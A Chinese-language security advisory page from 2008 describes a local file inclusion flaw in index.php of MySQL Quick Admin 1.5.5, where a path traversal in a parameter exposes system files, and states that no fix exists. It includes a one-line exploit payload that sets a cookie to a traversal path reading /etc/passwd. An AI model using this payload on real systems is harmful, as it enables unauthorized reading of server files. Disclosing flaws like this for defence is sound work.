岁月联盟 · 中国技术网 本站主页 | 安全认证 | 用户服务 | 技术论坛
新闻快报 | 新手学堂 | 黑客特区 | 程序语言 | 数 据 库 | 防 火 墙 | 路由交换 | 系统集成 | 服 务 器 | 存储备份 | 考试认证
Windows | Linux | Java | 协议分析 | 问题解答 | 进程大全 | 网页设计 | 多 媒 体 | 图库资料 | 软件下载 | 站内下载
  您现在的位置: 岁月联盟 >> 最新报道 >> 漏洞信息 >> 最新报道正文
MySQL Quick Admin index.php本地文件包含漏洞
作者:未知 文章来源:本站整理 点击数: 更新时间:2008-10-9 22:49:59

   影响版本(Vulnerable):
 
    EKINdesigns MySQL Quick Admin 1.5.5
 
    漏洞描述(Discription):

    MySQL Quick Admin是一款快速管理mysql的工具。
    MySQL Quick Admin不正确处理用户提交的WEB参数,远程攻击者可以利用漏洞以WEB权限查看系统文件内容。
提交包含多个"../"字符组成的参数,可绕过WEB ROOT限制,以WEB进程权限查看系统文件内容。

    安全建议(solution):

    目前没有解决方案提供:
    http://www.mysqlquickadmin.com/

   测试方法(Exploit):
    以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/";
  • 上一个最新报道:
  • 下一个最新报道:
    		•  
    热门文章
    推荐文章
    关于我们 | 发展历程 | 网站地图 | 广告服务 | 招贤纳士 | 战略合作 | 友情链接 | 著作声明 | 联系我们
    Copyright © 2002-2007 SYUE All rights reserved.
    E_mail:Admin@Syue.Com 皖ICP备05004589号
    未经授权禁止转载、摘编、复制或建立镜像.如有违反,追究法律责任.
    天龙八部私服 传世私服 传奇世界私服 天龙八部私服 bet365 天龙八部私服 热血江湖私服 英雄合击传奇私服 热血江湖私服 bet365 bet365